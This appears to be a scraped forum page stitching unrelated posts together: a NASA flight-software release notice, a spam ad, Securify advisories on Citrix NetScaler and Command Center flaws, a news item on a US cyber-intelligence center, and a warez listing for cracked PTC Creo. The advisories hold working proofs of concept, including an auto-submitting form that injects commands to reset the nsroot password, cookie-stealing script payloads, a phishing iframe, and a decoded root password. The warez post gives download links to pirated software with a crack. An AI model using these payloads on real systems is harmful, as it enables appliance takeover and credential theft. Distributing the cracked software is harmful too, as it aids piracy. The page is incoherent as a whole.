Search the Community

The Innovative Technology Partnerships Office at NASA's Goddard Space Flight Center in Greenbelt, Maryland, announced the release of its core Flight System (cFS) Application Suite to the public. The cFS application suite is composed of 12 individual Command and Data Handling (C&DH) flight software applications that together create a reusable library of common C&DH functions. The cFS application suite allows developers to rapidly configure and deploy a significant portion of the C&DH software system for new missions, test platforms and prototypes, resulting in reduced schedule and cost. The cFS framework takes advantage of a rich heritage of successful NASA Goddard flight software efforts and addresses the challenges of rapidly increasing software development costs and schedules due to constant changes and advancements in hardware. Flight software complexity is expected to increase dramatically in coming years and the cFS provides a means to manage the growth and accommodate changes in flight system designs. The cFS is currently being used by the Core Observatory of NASA’s Global Precipitation Measurement (GPM) mission, launched on Feb. 27, 2014, from Tanegashima Space Center in Japan, and it has also been used by NASA's Ames Research Center in Moffett Field, California, on their most recent mission, the NASA Lunar Atmosphere and Dust Environment Explorer (LADEE), which launched Sept. 6, 2013. Other centers such as NASA's Marshall Space Flight Center in Huntsville, Alabama, NASA's Glenn Research Center in Cleveland, Ohio, and NASA's Johnson Space Center in Houston are currently using the cFS as well. The core Flight Executive (cFE) and the Operating System Abstraction Library (OSAL) are two cFS components previously released as open source. These two components provide a platform-independent application runtime environment. The 12 applications in this release provide C&DH functionality common to most spacecraft Flight Software (FSW) systems. This means the current suite of cFS open source applications now provide a complete FSW system including a layered architecture with user-selectable and configurable features. These architectural features coupled with an implementation targeted for embedded software platforms makes the cFS suitable for reuse on any number of flight projects and/or embedded software systems at very significant cost savings. Each component in the system is a separate loadable file and are available to download free of cost at the links listed in the table. The complete cFS software suite will fully support the cFS user community and future generations of cFS spacecraft platforms and configurations. The cFS community expects the number of reusable applications to continue to grow as the user community expands. here we go -> NASA Goddard Releases Open Source Core Flight Software System Application Suite to Public | NASA

FITA is one of the best training center in Python training center in Chennai.We offering the best training and placement.more than company are searching the python trained student.

Citrix NITRO SDK Command Injection ------------------------------------------------------------------------ Command injection vulnerability in Citrix NITRO SDK xen_hotfix page ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.html This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data. The following proof of concept can be used to exploit this issue; <html> <body> <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST"> <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html> POST /nitro/v1/config/xen_hotfix HTTP/1.1 ----------------------------------------- object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]} or object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]} Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page. Citrx Command Center Advent JMX Servlet Accessible ------------------------------------------------------------------------ Advent JMX Servlet of Citrx Command Center is accessible to unauthenticated users ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Advent JMX Servlet of Citrix Command Center is accessible to unauthenticated users. This issue can be abused by attackers to comprise the entire application. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0494204 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.html The Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality exposed by the JMX Servlet can be invoked by an unauthenticated attacker, which can lead to unauthorized remote code execution and comprise of the entire application and services. In addition, this interface is also affected by Cross-Site Scripting. For example: https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script> Citrix NetScaler VPX Cross Site Scripting ------------------------------------------------------------------------ Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the help pages of Citrix VPX are vulnerable to Cross-Site Scripting. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10, other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.8nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example: https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Citrix NITRO SDK xen_hotfix Cross Site Scripting ------------------------------------------------------------------------ Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the xen_hotfix page of the Citrix NITRO SDK. This issue allows attackers to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9;, other versions may also be affected. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.html The Cross-Site Scripting vulnerability exists because the REST interface returns an incorrect Content-Type HTTP response header. The interfaces states that the content returned is HTML, while in fact it is JSON. Due to this it is possible to cause browser to render the JSON response as HTML. User input included in the JSON response is JSON encoded, not HTML encoded. Due to this, it is possible to inject arbitrary HTML content in the JSON data that will be rendered and executed by the browser. This issue is exploitable on the /nitro/v1/config/xen_hotfix page through the file_name parameter. Below is an example HTTP response in which this issue is demonstrated. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Wed, 16 Jul 2014 13:54:53 GMT { "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" } Proof of concept: <html> <body> <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain"> <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' /> <input type="submit" value="submit"> </form> <script> document.forms[0].submit(); </script> </body> </html> Citrix Command Center Configuration Disclosure ------------------------------------------------------------------------ Citrix Command Center allows downloading of configuration files ------------------------------------------------------------------------ Han Sahin, August 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that Citrix Command Center stores configuration files containing credentials of managed devices within a folder accessible through the web server. Unauthenticated attackers can download any configuration file stored in this folder, decode passwords stored in these files, and gain privileged access to devices managed by Command Center. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was discovered in Citrix Command Center 5.1 build 33.3 (including patch CC_SP_5.2_40_1.exe), other versions may also be vulnerable. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Citrix reports that this vulnerability is fixed in Command Center 5.2 build 42.7, which can be downloaded from the following location (login required). https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.html Citrix assigned BUG0493933 to this issue. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.html Configuration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way. https://<target>:8443/conf/securitydbData.xml This files contains encoded passwords, for example: <DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/> These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center.

In the wake of news-making attacks on Sony Pictures, Home Depot and many others, the federal government is establishing a new information integration center to focus on cyber threats. The center will analyze intelligence contributed by several agencies, along with the private sector, a model that will face some serious hurdles. The proposed Cyber Threat Intelligence Integration Center will fall under the Office of the Director of National Intelligence and it will not be responsible for actually gathering any threat intelligence. Rather, it will serve as an aggregation point for information collected by intelligence agencies and, the Obama administration hopes, private companies. A major piece of the plan for the CTIIC is for it to be a point of information exchange with the private sector, said Lisa Monaco, Assistant to the President for Homeland Security and Counterterrorism, in a speech Tuesday. That’s a strategy that the United States government has been trying to implement for the better part of two decades now in various incarnations. But there are two main issues with the information-sharing model: the government tends to hoard its intelligence and the private sector tends not to want to give and get nothing in return. Monaco said that for the CTIIC to be effective, both sides need to get past those challenges and start helping one another. “We’re not going to bottle up intelligence. We want the flow of information to go both ways,” Monaco said. In her speech at the Wilson Center in Washington, Monaco said that the CTIIC will be modeled after the National Counterterrorism Center and will draw on what the government and intelligence community learned about responding to and tracking threats after 9/11. She also hinted that the administration is going to be more aggressive in the future in tracking and prosecuting cyber criminals and other attackers. “There are structural, cultural and organizational shifts made in the government in counter-terror that also apply to cyber,” she said. “Those who would do us harm should know they will be found and they will be held to account.” Monaco cited the attack on Sony Pictures late last year as a key example of the kind of attack that the new CTIIC will be able to deal with. “That was a game-changer, because it wasn’t about profit, it was about a dictator trying to impose censorship,” she said. “Which is why we took the extraordinary step of identifying the attackers publicly.” Administration officials blamed the Sony hack on North Korea and later imposed more sanctions on the country as a result. Monaco did not specify when the CTIIC would be operational or who would be part of the new group. Sursa

Ptc Creo v2.0 M120 With Help center Multilanguage (x86/x64) Ptc Creo v2.0 M120 With Help center Multilanguage (x86/x64) | 6.77 GB SAD / CAM / CAE System American company PTC (Parametric Technology Corporation) is a CAD system of the upper level and covers all areas of design, technological preparation of production and manufacturing. A wide range of possibilities unit three-dimensional modeling, high quality of the result and its resistance to subsequent changes made by the system Creo one of the leading CAD / CAM / CAE-systems, and have direct access to the system life cycle support product Windchill PDMLink translates Creo in the category of PLM-systems . Year / Release Date: 2014 Version: Creo 2.0 M120 Developer: PTC Bit depth: 32bit + 64bit Language: Multilingual (Russian present) Medicine: Present (Team-SolidSQUAD (SSQ)) System requirements: Memory: 1Gb or more CPU speed: 2.4GHz or higher Disk Space 3Gb or more DOWNLOAD LINKS: http://u22088411.letitbit.net/download/91529.9f043404be65f4eaeaf045a47841/PTC_Creo_2.0_M120_SSQ.part1.rar.html http://u22088411.letitbit.net/download/82577.841c2ddd105ee976cc4c41c0c5be/PTC_Creo_2.0_M120_SSQ.part2.rar.html http://u22088411.letitbit.net/download/55839.5eb0ac556bf6152ccb6b28d43adf/PTC_Creo_2.0_M120_SSQ.part3.rar.html http://u22088411.letitbit.net/download/77272.709b684fd00a9a847a7d99424c99/PTC_Creo_2.0_M120_SSQ.part4.rar.html http://u22088411.letitbit.net/download/90397.98450bbc64674723527d21df6e70/PTC_Creo_2.0_M120_SSQ.part5.rar.html http://u22088411.letitbit.net/download/72022.781a1fbccd8996b7fbba74185507/PTC_Creo_2.0_M120_SSQ.part6.rar.html http://u22088411.letitbit.net/download/46598.434e847bf9a530cfaa932b4f9d22/PTC_Creo_2.0_M120_SSQ.part7.rar.html http://rapidgator.net/file/25ed3f9188f70544253d3aafdb6ea2e5/PTC_Creo_2.0_M120_SSQ.part1.rar.html http://rapidgator.net/file/1957774169ba60d35a0e9803e285dc6d/PTC_Creo_2.0_M120_SSQ.part2.rar.html http://rapidgator.net/file/8ca2a7e40f3f276f56cc21f3845cc56b/PTC_Creo_2.0_M120_SSQ.part3.rar.html http://rapidgator.net/file/fcde9b7bf8abfedc8195a3ca69ce64b8/PTC_Creo_2.0_M120_SSQ.part4.rar.html http://rapidgator.net/file/3eaa253e6773399725b369a653c9411e/PTC_Creo_2.0_M120_SSQ.part5.rar.html http://rapidgator.net/file/635b8f3c638b436b7c81c94f0fd85612/PTC_Creo_2.0_M120_SSQ.part6.rar.html http://rapidgator.net/file/e602b1b55139a54c8347e92eaceafb10/PTC_Creo_2.0_M120_SSQ.part7.rar.html http://uploaded.net/file/4dq5pf70/PTC_Creo_2.0_M120_SSQ.part1.rar http://uploaded.net/file/ixua764d/PTC_Creo_2.0_M120_SSQ.part2.rar http://uploaded.net/file/fal22t7n/PTC_Creo_2.0_M120_SSQ.part3.rar http://uploaded.net/file/8gsl23l0/PTC_Creo_2.0_M120_SSQ.part4.rar http://uploaded.net/file/hat7hz1h/PTC_Creo_2.0_M120_SSQ.part5.rar http://uploaded.net/file/yyd6cmg7/PTC_Creo_2.0_M120_SSQ.part6.rar http://uploaded.net/file/2jv18znb/PTC_Creo_2.0_M120_SSQ.part7.rar http://u18391561.shareflare.net/download/56723.510d9c264aee2c35164385de7056/PTC_Creo_2.0_M120_SSQ.part1.rar.html http://u18391561.shareflare.net/download/10269.1ac9c01685416df1d29e74c59459/PTC_Creo_2.0_M120_SSQ.part2.rar.html http://u18391561.shareflare.net/download/54148.55c11b110ddb60e070d28acb4bab/PTC_Creo_2.0_M120_SSQ.part3.rar.html http://u18391561.shareflare.net/download/81823.8619199b174a6341dad367b6341e/PTC_Creo_2.0_M120_SSQ.part4.rar.html http://u18391561.shareflare.net/download/65423.660556a2e48171006d281cf3d6c6/PTC_Creo_2.0_M120_SSQ.part5.rar.html http://u18391561.shareflare.net/download/09580.02c2f939db7aabbf5134f8e40e8c/PTC_Creo_2.0_M120_SSQ.part6.rar.html http://u18391561.shareflare.net/download/38217.38c8092d86c7af5675b0019f7652/PTC_Creo_2.0_M120_SSQ.part7.rar.html